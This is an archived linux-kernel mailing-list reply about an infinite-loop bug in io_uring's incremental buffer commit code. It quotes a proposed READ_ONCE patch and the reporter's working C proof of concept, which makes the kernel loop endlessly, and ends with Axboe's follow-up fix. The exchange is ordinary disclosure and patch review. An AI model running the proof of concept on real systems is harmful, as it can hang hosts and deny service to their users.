linux-kernel - Re: [PATCH 2/2] io_uring/kbuf: fix infinite loop in io_kbuf_inc

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <8abaf4ad-d457-422d-9e9e-932cab2588e6@kernel.dk>
Date: Wed, 27 Aug 2025 20:08:05 -0600
From: Jens Axboe <axboe@...nel.dk>
To: Qingyue Zhang <chunzhennn@...com>
Cc: aftern00n@...com, io-uring@...r.kernel.org, linux-kernel@...r.kernel.org
Subject: Re: [PATCH 2/2] io_uring/kbuf: fix infinite loop in
 io_kbuf_inc_commit()

On 8/27/25 7:36 PM, Qingyue Zhang wrote:
> On 2025-08-27 21:45 UTC, Jens Axboe wrote:
>> I took a closer look and there's another spot where we should be
>> using READ_ONCE() to get the buffer length. How about something like
>> the below rather than the loop work-around?
>>
>>
>> commit 7f472373b2855087ae2df9dc6a923f3016a1ed21
>> Author: Jens Axboe <axboe@...nel.dk>
>> Date:   Wed Aug 27 15:27:30 2025 -0600
>>
>>     io_uring/kbuf: always use READ_ONCE() to read ring provided buffer lengths
>>     
>>     Since the buffers are mapped from userspace, it is prudent to use
>>     READ_ONCE() to read the value into a local variable, and use that for
>>     any other actions taken. Having a stable read of the buffer length
>>     avoids worrying about it changing after checking, or being read multiple
>>     times.
>>     
>>     Fixes: c7fb19428d67 ("io_uring: add support for ring mapped supplied buffers")
>>     Link: https://lore.kernel.org/io-uring/tencent_000C02641F6250C856D0C26228DE29A3D30A@qq.com/
>>     Reported-by: Qingyue Zhang <chunzhennn@...com>
>>     Signed-off-by: Jens Axboe <axboe@...nel.dk>
>>
>> diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
>> index 81a13338dfab..394037d3f2f6 100644
>> --- a/io_uring/kbuf.c
>> +++ b/io_uring/kbuf.c
>> @@ -36,15 +36,18 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
>>  {
>>  	while (len) {
>>  		struct io_uring_buf *buf;
>> -		u32 this_len;
>> +		u32 buf_len, this_len;
>>  
>>  		buf = io_ring_head_to_buf(bl->buf_ring, bl->head, bl->mask);
>> -		this_len = min_t(u32, len, buf->len);
>> -		buf->len -= this_len;
>> -		if (buf->len) {
>> +		buf_len = READ_ONCE(buf->len);
>> +		this_len = min_t(u32, len, buf_len);
>> +		buf_len -= this_len;
>> +		if (buf_len) {
>>  			buf->addr += this_len;
>> +			buf->len = buf_len;
>>  			return false;
>>  		}
>> +		buf->len = 0;
>>  		bl->head++;
>>  		len -= this_len;
>>  	}
>> @@ -159,6 +162,7 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>>  	__u16 tail, head = bl->head;
>>  	struct io_uring_buf *buf;
>>  	void __user *ret;
>> +	u32 buf_len;
>>  
>>  	tail = smp_load_acquire(&br->tail);
>>  	if (unlikely(tail == head))
>> @@ -168,8 +172,9 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>>  		req->flags |= REQ_F_BL_EMPTY;
>>  
>>  	buf = io_ring_head_to_buf(br, head, bl->mask);
>> -	if (*len == 0 || *len > buf->len)
>> -		*len = buf->len;
>> +	buf_len = READ_ONCE(buf->len);
>> +	if (*len == 0 || *len > buf_len)
>> +		*len = buf_len;
>>  	req->flags |= REQ_F_BUFFER_RING | REQ_F_BUFFERS_COMMIT;
>>  	req->buf_list = bl;
>>  	req->buf_index = buf->bid;
>> @@ -265,7 +270,7 @@ static int io_ring_buffers_peek(struct io_kiocb *req, struct buf_sel_arg *arg,
>>  
>>  	req->buf_index = buf->bid;
>>  	do {
>> -		u32 len = buf->len;
>> +		u32 len = READ_ONCE(buf->len);
>>  
>>  		/* truncate end piece, if needed, for non partial buffers */
>>  		if (len > arg->max_len) {
> 
> I'm afraid this doesn't solve the problem. the value of buf->len
> could be changed before the function is called. Maybe we shouldn't
> trust it at all?
> 
> Here is a PoC that can still trigger infinite loop:
> 
> #include<liburing.h>
> #include<liburing/io_uring.h>
> #include<netinet/in.h>
> #include<stdint.h>
> #include<sys/socket.h>
> #include<arpa/inet.h>
> #include<stdlib.h>
> int main(){
>     struct io_uring ring;
>     struct io_uring_buf* buf_info;
> 
>     posix_memalign((void**)&buf_info, 4096, 4096);
>     char* buf = malloc(0x1000);
>     struct io_uring_buf_reg reg = {
>         .ring_addr = (uint64_t)buf_info,
>         .ring_entries = 2
>     };
>     buf_info[0].addr = (uint64_t)buf_info;
>     buf_info[0].len = 0x1000;
>     buf_info[0].bid = 0;
>     buf_info[0].resv = 1; // tail
>     io_uring_queue_init(0x10, &ring, IORING_SETUP_NO_SQARRAY);
>     io_uring_register_buf_ring(&ring, &reg, IOU_PBUF_RING_INC);
> 
>     int fds[2];
>     socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
>     void* send_buf = calloc(1, 32);
>     send(fds[0], send_buf, 32, MSG_DONTWAIT);
> 
>     struct io_uring_sqe* sqe = io_uring_get_sqe(&ring);
>     io_uring_prep_recv(sqe, fds[1], NULL, 0, 0);
>     sqe->flags |=  1<<IOSQE_BUFFER_SELECT_BIT;
>     io_uring_submit(&ring);
>     struct io_uring_cqe* cqe;
>     io_uring_wait_cqe(&ring, &cqe);
> }

Gotcha, yes the READ_ONCE() will ensure we only read it once and it
can't get changed in between in that loop, but this one receives into
the buffer ring.

I don't think there's anything wrong with the looping and stopping at
the other end is of course a safe guard, but couldn't we just abort the
loop if we see a 0 sized buffer? At that point we know the buffer is
invalid, or the kernel is buggy, and it'd be saner to stop at that
point. Something ala:


diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index 394037d3f2f6..19a8bde5e1e1 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -42,7 +42,8 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
 		buf_len = READ_ONCE(buf->len);
 		this_len = min_t(u32, len, buf_len);
 		buf_len -= this_len;
-		if (buf_len) {
+		/* Stop looping for invalid buffer length of 0 */
+		if (buf_len || !this_len) {
 			buf->addr += this_len;
 			buf->len = buf_len;
 			return false;

-- 
Jens Axboe